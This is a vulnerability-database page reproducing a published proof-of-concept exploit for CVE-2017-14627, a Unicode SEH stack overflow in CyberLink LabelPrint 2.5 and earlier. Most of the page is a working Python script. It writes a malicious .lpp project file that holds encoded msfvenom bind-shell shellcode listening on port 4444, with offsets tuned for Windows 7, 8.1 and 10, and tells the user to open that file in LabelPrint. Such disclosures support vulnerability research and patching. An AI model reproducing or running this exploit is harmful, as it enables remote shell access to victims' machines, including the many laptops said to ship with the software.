Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)

🗓️ 23 Sep 2017 00:00:00Reported by f3ciType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 56 Views

CyberLink LabelPrint Local Buffer Overflow (SEH Unicode

Related
Code
#!/usr/bin/python
# Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow
# Date: September 23, 2017
# Exploit Author: f3ci
# Vendor Homepage: https://www.cyberlink.com/
# Software Link: http://update.cyberlink.com/Retail/Power2Go/DL/TR170323-021/CyberLink_Power2Go_Downloader.exe
# Version: 2.5
# Tested on: Windows 7x86, Windows8.1x64, Windows 10
# CVE : CVE-2017-14627
# 
# Note: Cyberlink LabelPrint is bundled with Power2Go application and also included in most HP, Lenovo, and Asus laptops.
# this proof of concept is based on the LabelPrint 2.5 that comes with Power2Go installation.

def exp():
    header = ("\x3c\x50\x52\x4f\x4a\x45\x43\x54\x20\x76\x65\x72\x73\x69\x6f\x6e"
    "\x3d\x22\x31\x2e\x30\x2e\x30\x30\x22\x3e\x0a\x09\x3c\x49\x4e\x46"
    "\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x20\x74\x69\x74\x6c\x65\x3d\x22"
    "\x22\x20\x61\x75\x74\x68\x6f\x72\x3d\x22\x22\x20\x64\x61\x74\x65"
    "\x3d\x22\x37\x2f\x32\x34\x2f\x32\x30\x31\x37\x22\x20\x53\x79\x73"
    "\x74\x65\x6d\x54\x69\x6d\x65\x3d\x22\x32\x34\x2f\x30\x37\x2f\x32"
    "\x30\x31\x37\x22\x3e")
    filename2 = "labelprint_poc_universal.lpp"
    f = open(filename2,'w')
    junk = "A" * 790
    nseh = "\x61\x42"
    seh = "\x2c\x44"
    nop = "\x42"
 
    #msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python
    buf = ""
    buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
    buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
    buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
    buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
    buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
    buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
    buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
    buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
    buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
    buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
    buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
    buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
    buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
    buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
    buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"
    

    #preparing address for decoding
    ven = nop               #nop/inc edx
    ven += "\x54"           #push esp
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += "\x05\x1B\x01"   #add eax 01001B00 universal
    ven += nop              #nop/inc edx
    ven += "\x2d\x01\x01"   #sub eax 01001000
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += nop              #nop/inc edx
    ven += "\x5c"           #pop esp

    #we need to encode the RET address, since C3 is bad char.
    #preparing ret opcode
    ven += nop              #nop/inc edx
    ven += "\x25\x7e\x7e"   #and eax,7e007e00
    ven += nop              #nop/inc edx
    ven += "\x25\x01\x01"   #and eax,01000100
    ven += nop              #nop/inc edx
    ven += "\x35\x7f\x7f"   #xor eax,7f007f00
    ven += nop              #nop/inc edx
    ven += "\x05\x44\x44"   #add eax,44004400
    ven += nop              #nop/inc edx
    ven += "\x57"           #push edi
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += junk2            #depending OS
   
    #custom venetian 
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += align            #depending OS
    ven += nop              #nop/inc edx
    ven += "\x2d\x01\x01"   #add eax, 01000100 #align eax to our buffer
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += nop              #nop/inc edx
 
    #call esp 0x7c32537b MFC71U.dll
    ven += "\x5C"           #pop esp
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += "\x05\x53\x7c"   #add eax 7c005300 part of call esp
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += junk1            #depending OS
    ven += "\x7b\x32"       #part of call esp
 
    #preparing for shellcode
    ven += nop * 114        #junk
    ven += "\x57"           #push edi
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += align2           #depending OS
    ven += nop              #nop/inc edx
    ven += "\x2d\x01\x01"   #sub eax,01000100
    ven += nop              #nop/inc edx
    ven += buf              #shellcode

    sisa =  nop * (15000-len(junk+nseh+seh+ven))
    payload = junk+nseh+seh+ven+sisa
    bug="\x09\x09\x3c\x54\x52\x41\x43\x4b\x20\x6e\x61\x6d\x65\x3d"+'"'+payload+'"'+"/>\n" 
    bug+=("\x09\x3c\x2f\x49\x4e\x46\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x3e\x0a"
    "\x3c\x2f\x50\x52\x4f\x4a\x45\x43\x54\x3e")
    f.write(header+ "\n" + bug)

    print "[+] File", filename2, "successfully created!"
    print "[*] Now open project file", filename2, "with CyberLink LabelPrint."
    print "[*] Good luck ;)"
    f.close()
 
print "[*] <--CyberLink LabelPrint <=2.5 Stack Overflow POC-->"
print "[*] by f3ci & modpr0be <research[at]spentera.id>"
print "[*] <------------------------------------------------->\n"
print "\t1.Windows 7 x86 bindshell on port 4444"
print "\t2.Windows 8.1 x64 bindshell on port 4444"
print "\t3.Windows 10 x64 bindshell on port 4444\n" 
input = input("Choose Target OS : ")
try:
    if input == 1:
            align   = "\x05\x09\x01"    #add eax,01000400
            align2  = "\x05\x0A\x01"    #add eax, 01000900
            junk1   = '\x42' * 68       #junk for win7x86
            junk2   = '\x42' * 893      #junk for win7x86
            exp()
    elif input == 2:
            align   = "\x05\x09\x01"    #add eax,01000400
            align2  = "\x05\x0A\x01"    #add eax, 01000900
            junk1   = '\x42' * 116      #junk for win8.1x64
            junk2   = '\x42' * 845      #junk for win8.1x64
            exp()
    elif input == 3:
            align   = "\x05\x05\x01"    #add eax,01000400
            align2  = "\x05\x06\x01"    #add eax, 01000900
            junk1   = '\x42' * 136      #junk for win10x64
            junk2   = '\x42' * 313      #junk for win10x64
            exp()    
    else:
            print "Choose the right one :)"
except:
    print ""

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Sep 2017 00:00Current
7.9High risk
Vulners AI Score7.9
CVSS 26.8
CVSS 37.8
EPSS0.50197
cyberlink labelprintlocal overflowunicodewindows 7windows 8.1windows 10power2gohplenovoasuscve-2017-14627proof of concept
56